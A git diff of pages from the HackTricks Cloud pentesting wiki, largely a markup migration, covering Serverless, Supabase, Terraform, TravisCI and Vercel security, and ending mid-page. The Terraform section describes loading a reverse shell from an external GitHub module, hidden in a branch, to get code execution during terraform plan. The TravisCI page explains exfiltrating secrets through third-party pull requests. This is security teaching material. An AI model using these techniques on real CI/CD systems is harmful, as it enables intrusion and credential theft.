@@ -795,12 +792,12 @@ Exposed deployment configurations or unauthorized access to CI/CD pipelines can #### **Mitigation Strategies** -* **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. -* **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. -* **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. -* **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. +- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. +- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. +- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. +- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. -*** +--- ### **Vulnerabilities in Plugins and Extensions** 
@@ -808,12 +805,12 @@ Using unvetted or malicious third-party plugins can introduce vulnerabilities in #### **Mitigation Strategies** -* **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. -* **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. -* **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. -* **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. +- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. +- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. +- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. +- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. -*** +--- ### **Exposure of Sensitive Endpoints** 
@@ -821,12 +818,12 @@ Publicly accessible functions or unrestricted APIs can be exploited for unauthor #### **Mitigation Strategies** -* **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. -* **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. -* **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. -* **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. +- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. +- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. +- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. +- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. -*** +--- ### **Excessive Permissions for Team Members and External Collaborators** 
@@ -834,41 +831,28 @@ Granting excessive permissions to team members and external collaborators can le #### **Mitigation Strategies** -* **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. +- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. -*** +--- ### **Access Keys and License Keys Security** **Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI. -* **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. -* **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. +- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. +- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. #### **Security Risks** 1. **Exposure Through Code Repositories:** - * Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. + - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. 2. 
**Insecure Storage:** - * Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. + - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. 3. **Improper Distribution:** - * Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. + - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. 4. **Lack of Rotation:** - * Not regularly rotating keys extends the exposure period if keys are compromised. + - Not regularly rotating keys extends the exposure period if keys are compromised. 5. **Excessive Permissions:** - * Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. + - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md similarity index 62% rename from pentesting-ci-cd/supabase-security.md rename to src/pentesting-ci-cd/supabase-security.md index 3dda14511..40231a605 100644 --- a/pentesting-ci-cd/supabase-security.md +++ b/src/pentesting-ci-cd/supabase-security.md @@ -1,19 +1,6 @@ # Supabase Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information @@ -25,9 +12,8 @@ Basically when a project is created, the user will receive a supabase.co subdoma ## **Database configuration** -{% hint style="success" %} -**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** -{% endhint %} +> [!TIP] +> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ The password is a **password the user put** previously. @@ -36,17 +22,16 @@ Therefore, as the subdomain is a known one and it's used as username and the AWS This section also contains options to: -* Reset the database password -* Configure connection pooling -* Configure SSL: Reject plan-text connections (by default they are enabled) -* Configure Disk size -* Apply network restrictions and bans +- Reset the database password +- Configure connection pooling +- Configure SSL: Reject plan-text connections (by default they are enabled) +- Configure Disk size +- Apply network restrictions and bans ## API Configuration -{% hint style="success" %} -**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** -{% endhint %} +> [!TIP] +> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. 
@@ -120,7 +105,7 @@ Priority: u=1, i So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. -### secret / service\_role api keys +### secret / service_role api keys A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. @@ -134,22 +119,21 @@ A **JWT Secret** will also be generate so the application can **create and sign ### Signups -{% hint style="success" %} -By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. -{% endhint %} +> [!TIP] +> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: -
+
### Passwords & sessions It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ It's recommended to **improve the requirements as the default ones are weak**. -* User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) -* Bot and Abuse Protection: It's possible to enable Captcha. +- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) +- Bot and Abuse Protection: It's possible to enable Captcha. ### SMTP Settings 
@@ -157,37 +141,23 @@ It's possible to set an SMTP to send emails. ### Advanced Settings -* Set expire time to access tokens (3600 by default) -* Set to detect and revoke potentially compromised refresh tokens and timeout -* MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) -* Max Direct Database Connections: Max number of connections used to auth (10 by default) -* Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) +- Set expire time to access tokens (3600 by default) +- Set to detect and revoke potentially compromised refresh tokens and timeout +- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) +- Max Direct Database Connections: Max number of connections used to auth (10 by default) +- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) ## Storage -{% hint style="success" %} -Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). -{% endhint %} +> [!TIP] +> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). -* Set the upload file size limit (default is 50MB) -* The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` -* It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) +- Set the upload file size limit (default is 50MB) +- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. 
`58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) ## Edge Functions It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md similarity index 72% rename from pentesting-ci-cd/terraform-security.md rename to src/pentesting-ci-cd/terraform-security.md index 5cf8b2650..9f7047a30 100644 --- a/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md @@ -1,19 +1,6 @@ # Terraform Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information 
@@ -25,17 +12,17 @@ HashiCorp Terraform is an **infrastructure as code tool** that lets you define b Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. -![](<../.gitbook/assets/image (177).png>) +![](<../images/image (177).png>) HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. The core Terraform workflow consists of three stages: -* **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. -* **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. -* **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. +- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. 
+- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. +- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. -![](<../.gitbook/assets/image (215).png>) +![](<../images/image (215).png>) ### Terraform Lab @@ -53,9 +40,9 @@ The main way for an attacker to be able to compromise the system where terraform Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: -{% content-ref url="atlantis-security.md" %} -[atlantis-security.md](atlantis-security.md) -{% endcontent-ref %} +{{#ref}} +atlantis-security.md +{{#endref}} If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. @@ -100,7 +87,7 @@ You can find an example in [https://github.com/rung/terraform-provider-cmdexec]( Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions: -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: ```javascript module "not_rev_shell" { 
@@ -108,9 +95,9 @@ module "not_rev_shell" { } ``` -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` ### Terraform Apply @@ -223,12 +210,12 @@ data "external" "example" { Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats. -* **Features:** - * Real-time scanning for security vulnerabilities and compliance issues. - * Integration with version control systems (GitHub, GitLab, Bitbucket). - * Automated fix pull requests. - * Detailed remediation advice. -* **Sign Up:** Create an account on [Snyk](https://snyk.io/). +- **Features:** + - Real-time scanning for security vulnerabilities and compliance issues. + - Integration with version control systems (GitHub, GitLab, Bitbucket). + - Automated fix pull requests. + - Detailed remediation advice. +- **Sign Up:** Create an account on [Snyk](https://snyk.io/). ```bash brew tap snyk/tap 
@@ -254,16 +241,15 @@ checkov -d /path/to/folder From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code. -* **compliance:** Ensure the implemented code is following security standards, your own custom standards -* **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? -* **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) -* **pre-deploy:** it validates your code before it is deployed -* **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. -* **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. +- **compliance:** Ensure the implemented code is following security standards, your own custom standards +- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? +- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) +- **pre-deploy:** it validates your code before it is deployed +- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. +- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. -{% hint style="info" %} -Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. -{% endhint %} +> [!NOTE] +> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. ```bash pip install terraform-compliance 
@@ -275,17 +261,17 @@ terraform-compliance -f /path/to/folder From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. -* ☁️ Checks for misconfigurations across all major (and some minor) cloud providers -* ⛔ Hundreds of built-in rules -* 🪆 Scans modules (local and remote) -* ➕ Evaluates HCL expressions as well as literal values -* ↪️ Evaluates Terraform functions e.g. `concat()` -* 🔗 Evaluates relationships between Terraform resources -* 🧰 Compatible with the Terraform CDK -* 🙅 Applies (and embellishes) user-defined Rego policies -* 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. -* 🛠️ Configurable (via CLI flags and/or config file) -* ⚡ Very fast, capable of quickly scanning huge repositories +- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers +- ⛔ Hundreds of built-in rules +- 🪆 Scans modules (local and remote) +- ➕ Evaluates HCL expressions as well as literal values +- ↪️ Evaluates Terraform functions e.g. `concat()` +- 🔗 Evaluates relationships between Terraform resources +- 🧰 Compatible with the Terraform CDK +- 🙅 Applies (and embellishes) user-defined Rego policies +- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. +- 🛠️ Configurable (via CLI flags and/or config file) +- ⚡ Very fast, capable of quickly scanning huge repositories ```bash brew install tfsec 
@@ -306,11 +292,11 @@ docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/" From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to: -* Seamlessly scan infrastructure as code for misconfigurations. -* Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. -* Detect security vulnerabilities and compliance violations. -* Mitigate risks before provisioning cloud native infrastructure. -* Offers flexibility to run locally or integrate with your CI\CD. +- Seamlessly scan infrastructure as code for misconfigurations. +- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. +- Detect security vulnerabilities and compliance violations. +- Mitigate risks before provisioning cloud native infrastructure. +- Offers flexibility to run locally or integrate with your CI\CD. ```bash brew install terrascan 
@@ -318,22 +304,9 @@ brew install terrascan ## References -* [Atlantis Security](atlantis-security.md) -* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) -* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) -* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) +- [Atlantis Security](atlantis-security.md) +- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) +- [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) +- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
new file mode 100644
index 000000000..7b1c48cfb
--- /dev/null
+++ b/src/pentesting-ci-cd/todo.md
@@ -0,0 +1,16 @@
+# TODO
+
+{{#include ../banners/hacktricks-training.md}}
+
+Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+
+- Drone
+- TeamCity
+- BuildKite
+- OctopusDeploy
+- Rancher
+- Mesosphere
+- Radicle
+- Any other CI/CD platform...
+
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
new file mode 100644
index 000000000..93e22e2f4
--- /dev/null
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -0,0 +1,65 @@
+# TravisCI Security
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## What is TravisCI
+
+**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+
+{{#ref}}
+basic-travisci-information.md
+{{#endref}}
+
+## Attacks
+
+### Triggers
+
+To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+
+![](<../../images/image (145).png>)
+
+#### Cron Jobs
+
+If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+
+![](<../../images/image (243).png>)
+
+> [!NOTE]
+> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+
+### Third Party PR
+
+TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+
+![](<../../images/image (208).png>)
+
+### Dumping Secrets
+
+As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+
+- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
+- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
+- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+
+![](<../../images/image (81).png>)
+
+### TODO:
+
+- Example build with reverse shell running on Windows/Mac/Linux
+- Example build leaking the env base64 encoded in the logs
+
+### TravisCI Enterprise
+
+If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+
+- escape to the host?
+- compromise kubernetes?
+- compromise other machines running in the same network?
+- compromise new cloud credentials?
+
+## References
+
+- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
+- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
similarity index 60%
rename from pentesting-ci-cd/travisci-security/basic-travisci-information.md
rename to src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 1b24db9bd..deba53bfa 100644
--- a/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -1,19 +1,6 @@ # Basic TravisCI Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Access @@ -21,9 +8,9 @@ TravisCI directly integrates with different git platforms such as Github, Bitbuc For example, in Github it will ask for the following permissions: -* `user:email` (read-only) -* `read:org` (read-only) -* `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. +- `user:email` (read-only) +- `read:org` (read-only) +- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. ## Encrypted Secrets @@ -31,7 +18,7 @@ For example, in Github it will ask for the following permissions: In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. -![](<../../.gitbook/assets/image (203).png>) +![](<../../images/image (203).png>) It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). @@ -48,7 +35,7 @@ travis pubkey -r carlospolop/t-ci-test Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. -![](<../../.gitbook/assets/image (139).png>) +![](<../../images/image (139).png>) Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings. @@ -76,7 +63,7 @@ Commit all changes to your .travis.yml. Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: -![](<../../.gitbook/assets/image (170).png>) +![](<../../images/image (170).png>) ## TravisCI Enterprise 
@@ -100,19 +87,6 @@ Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deplo The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. -![](<../../.gitbook/assets/image (199).png>) +![](<../../images/image (199).png>) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md new file mode 100644 index 000000000..b9a1deb16 --- /dev/null +++ b/src/pentesting-ci-cd/vercel-security.md 
@@ -0,0 +1,437 @@ +# Vercel + +{{#include ../banners/hacktricks-training.md}} + +## Basic Information + +In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. + +For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). + +## Project Settings + +### General + +**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. + +#### Security Configurations: + +- **Transfer** + - **Misconfiguration:** Allows to transfer the project to another team + - **Risk:** An attacker could steal the project +- **Delete Project** + - **Misconfiguration:** Allows to delete the project + - **Risk:** Delete the prject + +--- + +### Domains + +**Purpose:** Manage custom domains, DNS settings, and SSL configurations. + +#### Security Configurations: + +- **DNS Configuration Errors** + - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. + - **Risk:** Domain hijacking, traffic interception, and phishing attacks. +- **SSL/TLS Certificate Management** + - **Misconfiguration:** Using weak or expired SSL/TLS certificates. + - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. +- **DNSSEC Implementation** + - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. + - **Risk:** Increased susceptibility to 